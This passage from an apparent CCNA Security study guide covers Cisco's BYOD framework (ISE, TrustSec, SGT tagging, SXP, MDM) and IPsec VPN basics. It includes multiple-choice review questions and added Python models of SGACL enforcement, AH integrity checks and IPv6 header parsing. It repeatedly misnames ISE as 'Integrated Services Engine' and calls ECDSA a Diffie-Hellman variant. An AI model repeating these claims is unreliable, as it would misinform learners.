A. Enable AAA authentication
B. Specify the TACACS+ server name
C. Enable per-command authorization
D. Specify the TACACS+ server IP address and type
12. When AAA services make use of an LDAP server, which component performs the authentication?
A. AAA server
B. LDAP server
C. Network access device
D. Supplicant
13. Which of the following is the ability to verify minimum security requirements of a device before allowing access?
A. Profiling
B. Posture assessment
C. Supplication
D. Authorization
14. Which of the following commands configures a local authorization method that provides access to the CLI on all lines?
A. aaa authorization default local
B. aaa authorization default exec local
C. aaa authorization exec default local
D. aaa authorization exec default
15. Which command creates a user account named adminsr that has a privilege level of 7 with an encrypted (secret) password of srpass?
A. username adminsr privilege 7 secret srpass
B. username adminsr privilege secret 7 srpass
C. username adminsr privilege srpass 7 secret
D. username privilege 7 adminsr secret srpass
16. Regarding controlling the activities of those with administrative access, why should you use user accounts rather than privilege levels?
A. Better performance
B. More accountability
C. Simpler configuration
D. Encrypted processes
17. Which of the following is false of RADIUS?
A. Industry standard
B. Uses UDP
C. Supports Cisco commands
D. Protects only the password
18. Which standard provides a security framework that includes a supplicant, authenticator, and authentication server?
A. 802.11
B. 802.3
C. 802.1x
D. 802.5
19. In the 802.1x framework, which device can operate as the authentication server?
A. RADIUS
B. Wireless AP
C. User laptop
D. VPN server
20. Which of the following is the ability to determine the type of device from which a network access request is originating?
A. Posture assessment
B. Profiling
C. Classification
D. Contextual awareness
Chapter 10 Securing a BYOD Initiative
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
2.4 BYOD
The BYOD architecture framework
Describe the function of mobile device management (MDM)
Despite the security challenges, users are increasingly demanding the right to use their personal mobile devices in the enterprise. Somewhat like the clamor for wireless access witnessed more than a decade ago, this outcry for a bring your own device (BYOD) initiative has reached the point where it can no longer be ignored. It has given rise to the development of mobile management software to gain control over these personal devices.
In this chapter, you will learn the following:
The BYOD architecture framework
The function of mobile device management (MDM)
The BYOD Architecture Framework
To enable the secure deployment of a BYOD initiative, Cisco has created an architectural framework that provides the components required to allow use of personal devices while ensuring that these devices are secure and free from malware every time they access the network. The framework may include the following functions:
The 802.1x framework
Mobile device management software
The Cisco Integrated Services Engine
The Cisco TrustSec provisioning and management platform
While you already understand the role that the 802.1x framework plays, in the following sections, the role that each of the other features plays in the Cisco BYOD architectural framework will be discussed.
Cisco ISE
The Cisco Integrated Services Engine (ISE) is a centralized identity-based policy platform that provides context-based access control for wired, wireless, and VPN connections. It combines AAA, posture assessment and profiling, and guest access management. The network access devices (NADs) can be wired switches, VPN servers, wireless access points, and controllers and routers.
ISE can take many items into account when assessing a connection request. Moreover, it can take the same context-based items into account when assessing authorization requests. As shown in Figure 10.1, the following can be considered during both the access request and the authorization request:
Who is the individual?
What device are they using?
Where are they connecting from?
When are they connecting?
How are they connecting?
FIGURE 10.1 ISE context-based access
The ISE can make use of several advanced features to provide granular and dynamic access control policies. Among these are the following:
Downloadable ACLs (dACLs): IP-based ACLs that are implemented on devices when the policy calls for it
Automatic VLAN assignment: To an employee, guest, or, in the case of a failed health check, a remediation VLAN
Security Group Access (SGAs): Applies a security group tag (SGT) that uniformly enforces the security group policy regardless of topology
Change of authorization (COA) updates: The ability of ISE to change the authorization policy in real time after the administrator makes a change, without requiring a log-off for the change to take effect
Posture assessment: Can check the health of a device before allowing access and, if the check fails, can remediate the device
Finally, the ISE can accept many authentication mechanisms, including the following:
802.1x: The ISE is a fully functional AAA server.
MAC authentication bypass (MAB): This is a port-based access control using the MAC address of the endpoint.
Web authentication (WebAuth): This enables network access for end hosts that do not support IEEE 802.1X authentication.
Later in this chapter, you'll see how ISE integrates with mobile device management to make successful and secure BYOD possible.
Cisco TrustSec
Another component in the Cisco BYOD architecture framework is Cisco TrustSec. It works in concert with ISE and other security devices to use security group tags and security group ACLs (SGACLs) to provide improved visibility into an access request. It uses logical policy groupings to define policies that control both access and authorization. The three main functions of TrustSec are to do the following:
Classify each device by assigning a security group tag (SGT) to its IP address.
Transport or communicate this classification information throughout the network using a process called inline tagging (for those networking devices that support inline tagging) or by using the SGT eXchange Protocol (SXP) for those networking devices that do not.
Enforce access rules through the examination of the SGTs.
Let's look at how TrustSec does this.
SGT Classification
Classification of a device is done through SGT classification using SGT tags. These tags, which are 16 bits in length, can be applied dynamically or statically. Dynamic tagging is applied through the Cisco ISE. Dynamic tagging is possible when the authentication method is 802.1x, MAC bypass, or web authentication. In dynamic tagging, the ISE pushes the SGT to the network access device (NAD).
Static tagging can also be performed, and when done, it can be done either on the ISE or directly in the NAD. Examples of this could be to map an entire subnet to an SGT or to map a VLAN to an SGT.
Inline SGT Transport
For those devices that support the feature, inline SGT transport can be used to propagate SGTs throughout the network. The sending device will embed the SGT into the Ethernet frame on egress. This tag will be read by the receiving device and propagated to the next device. The SGT will be in a new section of the Ethernet header called the Cisco Metadata (CMD) header. Its location is shown in Figure 10.2. As you can see, the CMD holds other information besides the SGT. Overall, this adds 20 bytes to the size of the header.
FIGURE 10.2 CMD
One thing to note is that in cases where two networking devices are also using 802.1ae security (MACsec), the addition of the 802.1ae header and ICV field will result in a total addition to the Ethernet header of 40 bytes.
SGT Exchange Protocol
For those devices that do not support inline SGT transport, the SGT eXchange Protocol (SXP) can be used to transport the SGT mappings. The goal is to get the classification information (in the form of SGTs) applied to the traffic to the upstream devices that must enforce the security.
SXP connections are used for this purpose and are point-to-point TCP-based connections created between two endpoints, one of which must be designated as the speaker and the other as the listener (any other combination of the two roles will fail). In Figure 10.3, the 2960 switch on the left is capable of SXP and uses it to send the SGT information to an upstream device (the 3750 switch) that is SGT capable, so when the 3560 sends to the CAT6500 (which is also SGT capable), the traffic is tagged as described in the previous section.
FIGURE 10.3 SXP and SGT
Also notice in Figure 10.3 that at the CAT6500 an enforcement action has occurred, blocking traffic at that point as a result of the SGT information. The four versions of SXP can be described as follows:
Version 1: Supports only IPv4 binding propagation.
Version 2: Supports both IPv4 and IPv6 binding propagation.
Version 3: Adds support for subnet to SGT mappings. If speaking to a lower-version listener, the speaker will expand the subnet.
Version 4: Adds loop detection and prevention, capability exchange, and a built-in keep-alive mechanism.
Enforcing SGACLs
TrustSec maintains a permission matrix with source group numbers (SGTs) on one axis and destination group numbers (SGTs) on the other. Each cell, or intersection of a row and column, contains an ordered list of rules (SGACLs) controlling the access between those two entities. The security group access lists (SGACLs) do not contain references to the SGTs. The action listed in each cell is incorporated into the access list for application. This allows a single ACL to be applied to many cells with a potentially different result based on the cell contents. Figure 10.4 shows an example of a permission matrix.
FIGURE 10.4 Permission matrix
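The permission matrix and SGACL reuse described above, modelled as an added example (this is not Cisco code): the matrix is keyed by source and destination SGT, each cell holds an ordered list of SGACL names, and the SGACLs carry no SGT references, so one SGACL serves several cells with different outcomes. SGT numbers, group names, SGACL contents, the implicit deny at the end of a listed cell, and the default for unconfigured cells are all constructed assumptions of the model.

```python
"""Model of a TrustSec permission matrix and SGACL enforcement.

Added illustration, not Cisco code. Assumptions of this model: the first
matching ACE decides; a cell whose SGACLs match nothing ends in an
implicit deny; a cell with no SGACLs falls back to a caller-supplied
default. SGT values, group names and SGACL contents are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Ace:
    """One access-control entry; proto 'ip' matches any protocol, port 0 any port."""
    action: str
    proto: str
    dst_port: int = 0


@dataclass(frozen=True)
class Flow:
    src_sgt: int
    dst_sgt: int
    proto: str
    dst_port: int = 0


# SGACLs: none of them mentions an SGT, which is what lets them be reused.
SGACLS: Dict[str, List[Ace]] = {
    "Permit_Web": [Ace("permit", "tcp", 443), Ace("permit", "tcp", 80)],
    "Permit_ICMP": [Ace("permit", "icmp")],
    "Permit_IP": [Ace("permit", "ip")],
    "Deny_IP": [Ace("deny", "ip")],
}

# Constructed security groups and their SGT numbers.
EMPLOYEE, GUEST, WEB_SERVERS, DB_SERVERS = 10, 20, 30, 40

# Permission matrix: (source SGT, destination SGT) -> ordered SGACL names.
MATRIX: Dict[Tuple[int, int], List[str]] = {
    (EMPLOYEE, WEB_SERVERS): ["Permit_Web", "Permit_ICMP"],
    (GUEST, WEB_SERVERS): ["Permit_Web"],
    (EMPLOYEE, DB_SERVERS): ["Deny_IP"],
    (GUEST, DB_SERVERS): ["Deny_IP"],
    (WEB_SERVERS, DB_SERVERS): ["Permit_IP"],
}


def _ace_matches(ace: Ace, flow: Flow) -> bool:
    proto_ok = ace.proto == "ip" or ace.proto == flow.proto
    port_ok = ace.dst_port == 0 or ace.dst_port == flow.dst_port
    return proto_ok and port_ok


def enforce(flow: Flow, matrix=MATRIX, sgacls=SGACLS,
            unconfigured_default: str = "permit") -> Tuple[str, str]:
    """Return (action, reason) for a flow by walking the cell's SGACLs in order."""
    names = matrix.get((flow.src_sgt, flow.dst_sgt))
    if names is None:
        # No row/column entry for this pair: apply the matrix-wide default.
        return unconfigured_default, "unconfigured-cell-default"
    for name in names:
        for ace in sgacls[name]:
            if _ace_matches(ace, flow):
                return ace.action, name
    return "deny", "implicit-deny"


def cells_using(acl_name: str, matrix=MATRIX) -> List[Tuple[int, int]]:
    """Cells that reuse a given SGACL (the 'single ACL, many cells' point)."""
    return sorted(cell for cell, names in matrix.items() if acl_name in names)


def add_security_group(matrix: Dict[Tuple[int, int], List[str]], new_sgt: int,
                       existing_sgts: List[int], default_acl: str) -> None:
    """A new group adds a row and a column: one cell per existing group, each way."""
    for sgt in existing_sgts:
        matrix.setdefault((new_sgt, sgt), [default_acl])
        matrix.setdefault((sgt, new_sgt), [default_acl])


if __name__ == "__main__":
    for f in (Flow(EMPLOYEE, WEB_SERVERS, "tcp", 443),
              Flow(GUEST, WEB_SERVERS, "icmp"),
              Flow(EMPLOYEE, DB_SERVERS, "tcp", 3306)):
        print(f, "->", enforce(f))
```

Note how Permit_Web yields a permit for an employee's ICMP only because the employee cell lists Permit_ICMP after it, while the guest cell, with the same SGACL, ends in the implicit deny.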
Enforcement Using SGFW
The Cisco Adaptive Security Appliance and several other routing platforms use a different method to enforce TrustSec. While ISE manages SGACLs centrally, these devices are configured individually with ACLs that reference the SGT numbers or security group names. For the ASA to be able to use these SGTs or security group names, the ASA must also be configured with a security group table to map security group names to tags, and an SGT to IP address mapping must exist.
Benefits
In the absence of TrustSec technology, access control lists (ACLs) must be updated whenever the following events occur:
New building on the campus
New branch office
New business partner
Expansion of wireless coverage
Addition of new servers
Since these ACLs are each tied to a device and must be written from the network perspective of that device, keeping these ACLs updated and maintained can be a nightmare. This is all easier to manage with the TrustSec technology.
Using TrustSec, any new devices must simply be classified at the ingress point of the network, and the security for that device is maintained throughout the network by the associated security group ACL (SGACL). In cases where the introduction of a new device might require the creation of a new security group, rather than the addition to an existing group, a new row and column are added to the access matrix. This matrix is updated and maintained by the ISE, and changes are dynamically propagated across the TrustSec domain.
The Function of Mobile Device Management
Mobile device management software is designed to make it possible to exert control over personal mobile devices that users want to use on the enterprise network. When used in conjunction with ISE, the combination can be a powerful and secure identity and authentication solution for both company-owned and non-company-owned devices.
In the context of a BYOD architecture, the ISE, when working in combination with a mobile management policy, ties together the provisioning of mobile devices along with a health check of the device at each connection request, as shown in Figure 10.5.
FIGURE 10.5 MDM with ISE
Integration with ISE Authorization Policies
Beyond the health check that can be performed, as described in the previous section, an MDM solution can integrate with ISE authorization policies. For example, let's consider a scenario where an organization uses EAP-TLS for the authentication of company-owned devices. As EAP-TLS is a mechanism that requires a certificate on both the authentication server and the supplicant, company-owned devices will possess such a certificate while employee-onboarded devices will not.
Using this information, ISE can perform an assessment (as shown in Figure 10.6), identify the device type, and apply a unique authorization profile to each group of devices.
FIGURE 10.6 ISE authorization policy integration
Summary
In this chapter, you learned about the challenges involved in supporting a BYOD initiative. The chapter discussed the components provided by Cisco for this, including the Cisco Integrated Services Engine (ISE) and the Cisco TrustSec provisioning and management platform. You also learned about the advanced features of Cisco ISE, including downloadable ACLs (dACLs), automatic VLAN assignment, security group access (SGA), change of authorization (COA), and posture assessment. Further, the chapter discussed the authentication mechanisms ISE can accept, including 802.1x, MAC authentication bypass (MAB), and web authentication (WebAuth). Finally, the chapter ended by covering the three main functions of TrustSec.
Exam Essentials
Identify the possible components of a BYOD architectural framework. The framework may include the following functions: the 802.1x framework, mobile device management software, the Cisco Integrated Services Engine (ISE), and the Cisco TrustSec provisioning and management platform.
Describe the advanced features of Cisco ISE. These services include downloadable ACLs (dACLs), automatic VLAN assignment, security group access (SGAs), change of authorization (COA), and posture assessment.
Identify the authentication mechanisms ISE can accept. The ISE can accept many authentication mechanisms, including 802.1x, MAC authentication bypass (MAB), and web authentication (WebAuth).
Identify the three main functions of TrustSec. The three main functions of TrustSec are to classify each device by assigning a security group tag (SGT) to its IP address, to transport or communicate this classification information throughout the network using a process called inline tagging (for networking devices that support inline tagging) or using the SGT eXchange Protocol (SXP) for those networking devices that do not, and to enforce access rules through the examination of the SGTs.
Review Questions
1. Which of the following is a centralized identity-based policy platform that provides context-based access control for wired, wireless, and VPN connections?
A. BYOD
B. TACACS+ server
C. ISE
D. TrustSec
2. Using ISE, which of the following cannot be considered during both the access request and the following authorization request?
A. Why are they connecting?
B. What device are they using?
C. Who is the individual?
D. Where are they connecting from?
3. Which of the following are implemented on devices when a policy calls for it?
A. dACLs
B. SGAs
C. COA
D. Posture assessment
4. Which ISE feature applies a security group tag (SGT) that uniformly enforces the security group policy regardless of topology?
A. dACLs
B. SGAs
C. COA
D. Posture assessment
5. Which ISE feature provides the ability of ISE to change the authorization policy in real time?
A. dACLs
B. SGAs
C. COA
D. Posture assessment
6. Which of the following ISE features checks the health of a device before allowing access and, if the check fails, can remediate the device?
A. dACLs
B. SGAs
C. COA
D. Posture assessment
7. Which ISE authentication mechanism enables network access for end hosts that do not support IEEE 802.1X authentication?
A. WebAuth
B. MAC bypass
C. WEP
D. WPA
8. Which of the following is not a main function of TrustSec?
A. Classification of devices
B. Assessment of devices
C. Transport of classification information
D. Enforcement of access rules
9. Which of the following is used to classify a device?
A. SGA
B. SGT
C. SXP
D. NAD
10. Which of the following is used to transport or communicate classification information for those networking devices that do not support inline tagging?
A. SXP
B. SGA
C. SGT
D. SGFW
11. With which of the following authentication methods is dynamic tagging not possible?
A. WEP
B. 802.1x
C. WebAuth
D. MAC bypass
12. Where is the SGT found when using inline transport?
A. CMD header
B. IP header
C. 802.1ae header
D. ICV
13. How much does the CMD add to the size of the Ethernet header?
A. 16 bytes
B. 18 bytes
C. 20 bytes
D. 22 bytes
14. In cases where two networking devices are also using 802.1ae security (MACsec), what will be the total addition to the Ethernet header?
A. 20 bytes
B. 28 bytes
C. 30 bytes
D. 40 bytes
15. Which of the following is the only combination of SXP roles that will result in a successful SXP connection between two devices?
A. Speaker and speaker
B. Listener and speaker
C. Transmitter and receiver
D. Speaker and receiver
16. Which SXP version added support for subnet to SGT mappings?
A. 1
B. 2
C. 3
D. 4
17. Which method of enforcement does the ASA use?
A. SGFW
B. Inline
C. SXP
D. 802.1x
18. Which of the following makes it possible to exert control over personal mobile devices that users want to use on the enterprise network?
A. MDM
B. 802.11i
C. VTP
D. DTP
19. What additional functionality does the addition of ISE to MDM provide for devices connecting?
A. Posture assessment
B. IP identification
C. TACACS+
D. NAT
20. Which of the following is examined to enforce access rules?
A. NAT
B. SGT
C. SXP
D. MAC
Chapter 11 Understanding VPNs
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
3.1 VPN concepts
Describe IPsec protocols and delivery modes (IKE, ESP, AH, tunnel mode, transport mode)
Describe hairpinning, split tunneling, always-on, NAT traversal
Virtual private network (VPN) connections are widely used to provide a secure method of remote access to the enterprise network. As the sophistication of these connection types has evolved, many additional uses have been found for this concept. Today we use these connections between offices in the place of WAN connections for which we once paid. In this chapter, we will introduce the underlying concepts that make VPNs functional and secure.
In this chapter, you will learn the following:
The protocols that comprise IPsec and the delivery modes in which IPsec can be configured
Advanced features of VPN connections, including hairpinning, split tunneling, always-on VPNs, and NAT traversal
Understanding IPsec
While IPsec is a protocol, it is also a framework that provides many choices to people configuring an IPsec connection. The framework does not lock one into a certain encryption algorithm, hashing algorithm, or authentication mechanism. Depending on the choice of components that are part of the IPsec protocol suite, you can get several different security services. In this section, you'll learn about those services and the protocols and components that make them possible. You'll also learn about the possible delivery modes of IPsec and about IPsec's relationship to the IPv6 protocol.
Security Services
The security services offered by IPsec are impressive, which is why it has become so widely embraced. One of its more frequent implementations is its use in VPN connections. These connections can be of two types: remote access VPNs, in which the traditional dial-up connection is updated to create a secure (and free) pathway through the most untrusted network there is (the Internet), and site-to-site VPNs, which can replace WAN connections that cost money with secure (and free) tunnels for all traffic traversing the sites. Let's look at the security services that have made IPsec so ubiquitous.
Confidentiality
Confidentiality can be provided with IPsec and represents one of the choices that can be made when setting up a connection. As you will learn later in the chapter, when you choose to use ESP, one of the protocols in the suite, at the least the data payload will be encrypted, and, depending on the delivery mode, the entire packet including the header may be encrypted.
Data Integrity
IPsec will always provide data integrity, which means you can be assured that the data has not been changed or corrupted in transit. It does this by using the hashing algorithm you select during implementation. This is called a hash-based message authentication code (HMAC).
Origin Authentication
IPsec will also always provide this security service. Origin authentication means that you can be assured the data came from whom it appears to come from. IPsec will authenticate the connection by using the following:
PSKs
Digital certificates
RSA-encrypted nonces
While these processes authenticate the system connecting, extended authentication provides authentication of the user behind the system and is optional.
Anti-Replay
IPsec supports anti-replay. To prevent the replay of authentication packets, IPsec examines sequence numbers in the packets. If a packet arrives late or is a duplicate of an earlier packet, it will be dropped.
Key Management
The key management process in IPsec provides for the dynamic generation of keys to be used for encryption and for their secure exchange over an untrusted network, such as the Internet. If the Diffie-Hellman key exchange algorithm is used, an asymmetric algorithm is used to create and exchange symmetric keys for this process. This is part of a larger process called the Internet Key Exchange (IKE). Figure 11.1 shows a simplified version of the key generation and exchange process. A formula is used to generate both Bob's and Alice's secret integer base numbers (the first step, which they perform independently of one another). They exchange those values and use them with an algorithm in the second step, which results in them generating keys to be used for encryption.
FIGURE 11.1 Diffie-Hellman
A variant of this process called the Elliptical Curve digital signature algorithm (ECDSA) is also available and is part of the Suite B standard.
Suite B Cryptographic Standard
In 2005, the NSA identified a set of cryptographic algorithms that are the preferred method for security of information. It called these algorithms Suite B. These algorithms use a minimum key length of at least 128 bits. The use of these algorithms helps to ensure compliance with many standards such as PCI-DSS, HIPAA, and FIPS.
Suite B cryptography uses the following algorithms:
AES encryption with either 128- or 256-bit keys
SHA-2 hashing
Elliptical Curve digital signature algorithm (ECDSA) for digital signatures using 256- and 384-bit prime moduli
Key exchange using ECDH/ECDSA
Protocols
There are four protocols used in the IPsec process. One of them, the Internet Key Exchange, has two versions. In the next sections, we will discuss each of these protocols and the role each plays in the process.
IKEv1
The Internet Key Exchange (IKE) protocol is used for many functions in the IPsec framework.
Automatic key generation: This happens as discussed earlier with Diffie-Hellman.
Automatic key refresh: This includes the generation of new keys periodically.
Negotiation of the security association (SA): A security association is negotiated successfully if certain configuration selections match on both ends of the connection.
There are two versions of IKE. IKEv2 was designed to overcome limitations inherent in IKEv1. IKEv2 will be covered later in this section. IKE operates in two phases.
Phase 1
In phase 1, IKE negotiates the policy sets (the configuration selections made on either end), authenticates the peer devices to one another, and sets up a secure channel. This phase can be performed in two different modes, Main and Aggressive. A choice must be made between the two, and usually this choice is based on whether the main concern is performance or security. While Main mode requires more messages, it does not expose the identity of the peers. While Aggressive mode requires fewer messages, peer identities are exposed before the secure channel is created.
Main Mode
Main mode consists of three exchanges.
Peers negotiate the encryption and hashing algorithms to be used.
The Diffie-Hellman protocol is used to generate a shared symmetric key.
The SA is built, and then the peers authenticate one another within the SA.
Figure 11.2 shows this process.
FIGURE 11.2 IKE phase 1
Aggressive Mode
In Aggressive mode, there are only two messages. The initiator passes all information required for the SA, and the responder sends the proposal, key material, and ID and performs authentication in the next message. This makes negotiation quicker. While Aggressive mode requires fewer messages, peer identities are exposed before the secure channel is created.
Phase 2
While the purpose of phase 1 is to create a secure channel for the phase 2 operations, in phase 2 the parameters that define the IPsec connection are negotiated. In phase 2, the following functions are performed:
The IPsec transform set is negotiated.
The SA is established.
Periodically the SA is renegotiated.
Optional DH key exchanges that have been configured will be performed.
There will be two SAs created because these are unidirectional.
IKEv2
The enhancements provided with IKEv2 are as follows:
Fewer transactions, which results in increased speed
Incorporates extensions such as NAT traversal and dead peer detection
Stronger security through denial-of-service protection
More reliability using sequence numbers and acknowledgments
Supports mobility through the IKEv2 Mobility and Multihoming Protocol (MOBIKE)
ISAKMP
Internet Security Association and Key Management Protocol (ISAKMP) is the framework within which IKE performs the dynamic generation of keys. Using IKE and Diffie-Hellman, the result is a security association. This association is based on the successful negotiation of security parameters. In Figure 11.3, the parameters that must match between two devices, R1 and R2, are shown, and in this case, they match.
FIGURE 11.3 Matching ISAKMP parameters
AH
When confidentiality of an IPsec connection is not required, the Authentication Header (AH) protocol can be used. While it does provide data integrity, origin authentication, and anti-replay protection, the data is sent in cleartext. To provide these features, the following steps are used:
1. The immutable fields of the IP header, the data, and the shared key are sent through a hashing algorithm.
2. The resulting hash value is prepended to the original packet.
3. The packet is transmitted to the peer.
4. The peer calculates a hash value from the received packet and compares this value to the one received. If they match, data integrity and origin authentication are validated.
Figure 11.4 shows this process.
FIGURE 11.4 AH process
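The four AH steps above, together with the sequence-number anti-replay check from the Anti-Replay section, as an added example that is not part of the original text and is not an RFC 4302 implementation: the IP header is a dict, the ICV is an HMAC-SHA256 over the immutable header fields, the sequence number and the payload, TTL is treated as a mutable field that a hop may rewrite, and the shared key is a constructed value standing in for what IKE would negotiate.

```python
"""AH-style integrity, origin authentication and anti-replay, simplified.

Added illustration, not an RFC 4302 implementation. The header is a dict,
the ICV is HMAC-SHA256 over the immutable fields + sequence number + data,
and SHARED_KEY is a constructed stand-in for a key negotiated by IKE.
"""
import hashlib
import hmac
from typing import Any, Dict, Tuple

SHARED_KEY = b"constructed-demo-key"          # constructed; IKE would supply this
# Header fields that do not change in transit and are covered by the ICV.
# TTL is deliberately absent: routers decrement it, so AH cannot protect it.
IMMUTABLE_FIELDS = ("version", "src", "dst", "protocol", "length")

Packet = Dict[str, Any]


def _icv(header: Dict[str, Any], payload: bytes, key: bytes) -> bytes:
    """Step 1: hash immutable header fields, sequence number and data with the shared key."""
    mac = hmac.new(key, digestmod=hashlib.sha256)
    for name in IMMUTABLE_FIELDS:
        mac.update(f"{name}={header[name]};".encode())
    mac.update(f"seq={header['seq']};".encode())   # sequence number is authenticated too
    mac.update(payload)
    return mac.digest()


def ah_protect(header: Dict[str, Any], payload: bytes, seq: int,
               key: bytes = SHARED_KEY) -> Packet:
    """Steps 1-2: compute the ICV and attach it to the packet (step 3 is sending it)."""
    hdr = dict(header, seq=seq)
    return {"header": hdr, "icv": _icv(hdr, payload, key), "payload": payload}


class AhReceiver:
    """Step 4 (recompute and compare) followed by a sliding-window anti-replay check."""

    def __init__(self, key: bytes = SHARED_KEY, window: int = 64) -> None:
        self.key = key
        self.window = window
        self.highest = 0            # highest sequence number accepted so far
        self.seen: set = set()      # accepted sequence numbers still inside the window

    def receive(self, pkt: Packet) -> Tuple[bool, str]:
        hdr = pkt["header"]
        expected = _icv(hdr, pkt["payload"], self.key)
        # Constant-time compare; a mismatch means tampering or a different key.
        if not hmac.compare_digest(expected, pkt["icv"]):
            return False, "integrity/origin check failed"
        seq = hdr["seq"]
        if seq in self.seen:
            return False, "replayed packet"
        if seq <= self.highest - self.window:
            return False, "packet arrived too late"
        self.seen.add(seq)
        if seq > self.highest:
            self.highest = seq
            # Forget sequence numbers that have fallen out of the window.
            self.seen = {s for s in self.seen if s > self.highest - self.window}
        return True, "accepted"


if __name__ == "__main__":
    hdr = {"version": 4, "src": "10.0.0.1", "dst": "10.0.0.2",
           "protocol": 6, "length": 60, "ttl": 64}       # constructed header
    rx = AhReceiver()
    first = ah_protect(hdr, b"hello", 1)
    print(rx.receive(first))    # (True, 'accepted')
    print(rx.receive(first))    # (False, 'replayed packet')
```

The integrity check runs before the replay check, so a tampered duplicate is reported as an integrity failure rather than a replay.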
ESP
When Encapsulating Security Payload (ESP) is selected, you get all the protections provided by AH plus encryption. The extent of this encryption depends on the delivery mode selected.
Delivery Modes
There are two modes of delivery available with IPsec, and the difference between the two modes is in which parts of the packet are protected by AH and ESP. Let's look at how these two modes operate in both AH and ESP.
Tunnel Mode
In tunnel mode, the entire original packet is protected by either encryption or authentication. In addition, in both AH and ESP, when tunnel mode is used, a new IP header is created that includes the tunnel source and destination address. First let's see how tunnel mode looks when using AH.
AH
When AH is used in tunnel mode, the entire packet is authenticated, and a new IP header is added, as shown in Figure 11.5.
FIGURE 11.5 AH in tunnel mode
ESP
When ESP is used in tunnel mode, the entire packet is encrypted, and a new IP header is added, as shown in Figure 11.6. A new ESP header is added and encapsulated with the original packet. Finally, a new IP header is added. Notice that all but the new IP header is also authenticated.
FIGURE 11.6 ESP in tunnel mode
Transport Mode
In transport mode, only the payload is protected by either encryption or authentication. First let's see how transport mode looks when using AH.
AH
When AH is used in transport mode, only the payload is authenticated, as shown in Figure 11.7.
FIGURE 11.7 AH in transport mode
ESP
When ESP is used in transport mode, only the payload is encrypted, as shown in Figure 11.8. Notice again that all but the IP header is also authenticated.
FIGURE 11.8 ESP in transport mode
IPsec with IPv6
While the use of IPsec is not required when using IPv6, the IPv6 packet structure was redesigned to accommodate its use. In IPv4, AH and ESP were implemented as IP protocol headers. In IPv6, extension headers are used instead. These headers, when used, come after the original IPv6 header. The next header field in the original IPv6 header is used to indicate whether the extension header is AH or ESP. It uses the protocol value of 50 for ESP and 51 for AH. Figure 11.9 shows the IPv6 header. Note the next header field. Also note that the extension header lies between the IPv6 header and the payload.
FIGURE 11.9 IPv6 header with extensions
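The next-header chaining described above, as an added example that is not from the original text or from Cisco: a parser walks an IPv6 base header and its extension headers, reports whether AH (51) or ESP (50) sits between the IPv6 header and the payload, and stops at ESP because everything after its SPI and sequence number is encrypted. It goes slightly beyond the text by also stepping over hop-by-hop, routing, destination-options and fragment headers. The packets, addresses (2001:db8::), ICV and ciphertext bytes are all constructed.

```python
"""Walk an IPv6 extension-header chain and report AH (51) / ESP (50).

Added illustration, not Cisco code. Sample packets below are constructed.
"""
import struct
from typing import Dict, List, Optional

IPV6_HEADER_LEN = 40
NH_HOPOPT, NH_TCP, NH_UDP, NH_ROUTING = 0, 6, 17, 43
NH_FRAGMENT, NH_ESP, NH_AH, NH_DSTOPTS = 44, 50, 51, 60
NAMES = {NH_HOPOPT: "Hop-by-Hop", NH_TCP: "TCP", NH_UDP: "UDP",
         NH_ROUTING: "Routing", NH_FRAGMENT: "Fragment", NH_ESP: "ESP",
         NH_AH: "AH", NH_DSTOPTS: "Destination Options"}
# Extension headers whose second byte is the length in 8-octet units,
# not counting the first 8 octets.
GENERIC_EXT = {NH_HOPOPT, NH_ROUTING, NH_DSTOPTS}


def walk_ipv6(pkt: bytes) -> Dict[str, object]:
    """Return the header chain, the IPsec header found (if any), and the upper-layer protocol."""
    if len(pkt) < IPV6_HEADER_LEN or pkt[0] >> 4 != 6:
        raise ValueError("not an IPv6 packet")
    nh = pkt[6]                   # next header field of the base IPv6 header
    offset = IPV6_HEADER_LEN      # extension headers begin right after the base header
    chain: List[str] = []
    ipsec: Optional[str] = None
    while True:
        if nh == NH_ESP:
            # SPI and sequence number are in the clear; the real next header is in the
            # encrypted ESP trailer, so the walk has to stop here.
            chain.append("ESP")
            return {"chain": chain, "ipsec": "ESP", "upper": None}
        if nh == NH_AH or nh == NH_FRAGMENT or nh in GENERIC_EXT:
            if offset + 2 > len(pkt):
                raise ValueError("truncated extension header")
            chain.append(NAMES[nh])
            next_nh, length_field = pkt[offset], pkt[offset + 1]
            if nh == NH_AH:
                ipsec = "AH"
                offset += (length_field + 2) * 4   # AH length: 32-bit words minus 2
            elif nh == NH_FRAGMENT:
                offset += 8                        # fragment header is a fixed 8 bytes
            else:
                offset += (length_field + 1) * 8
            nh = next_nh
            continue
        chain.append(NAMES.get(nh, f"proto-{nh}"))
        return {"chain": chain, "ipsec": ipsec, "upper": nh}


# ---- constructed sample packets -------------------------------------------
SRC = bytes.fromhex("20010db8" + "00" * 11 + "01")   # 2001:db8::1
DST = bytes.fromhex("20010db8" + "00" * 11 + "02")   # 2001:db8::2


def build_ipv6(next_header: int, body: bytes) -> bytes:
    """Base header: version 6, zero traffic class/flow label, hop limit 64."""
    return struct.pack("!IHBB", 0x60000000, len(body), next_header, 64) + SRC + DST + body


def build_ah(next_header: int, spi: int, seq: int, icv: bytes) -> bytes:
    """AH: next header, payload length (32-bit words minus 2), reserved, SPI, sequence, ICV."""
    total = 12 + len(icv)
    return struct.pack("!BBHII", next_header, total // 4 - 2, 0, spi, seq) + icv


TCP_SEG = b"\x00\x50\x1f\x90" + b"\x00" * 16            # constructed 20-byte TCP segment
DUMMY_ICV = b"\xab" * 12                                 # constructed 96-bit ICV
PKT_PLAIN = build_ipv6(NH_TCP, TCP_SEG)
PKT_AH = build_ipv6(NH_AH, build_ah(NH_TCP, 0x100, 1, DUMMY_ICV) + TCP_SEG)
PKT_ESP = build_ipv6(NH_ESP, struct.pack("!II", 0x200, 1) + b"\x5c" * 32)  # SPI, seq, ciphertext
HBH = bytes([NH_AH, 0, 1, 4, 0, 0, 0, 0])                # hop-by-hop: next=AH, len 0, PadN option
PKT_HBH_AH = build_ipv6(NH_HOPOPT, HBH + build_ah(NH_UDP, 0x300, 7, DUMMY_ICV) + b"\x00" * 8)

if __name__ == "__main__":
    for name, pkt in (("plain", PKT_PLAIN), ("ah", PKT_AH), ("esp", PKT_ESP), ("hbh+ah", PKT_HBH_AH)):
        print(name, walk_ipv6(pkt))
```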
Understanding Advanced VPN Concepts
When implementing IPsec, some scenarios may present challenges. In this section, you'll learn how to overcome specific issues and learn about some additional advanced configuration topics.
Hairpinning
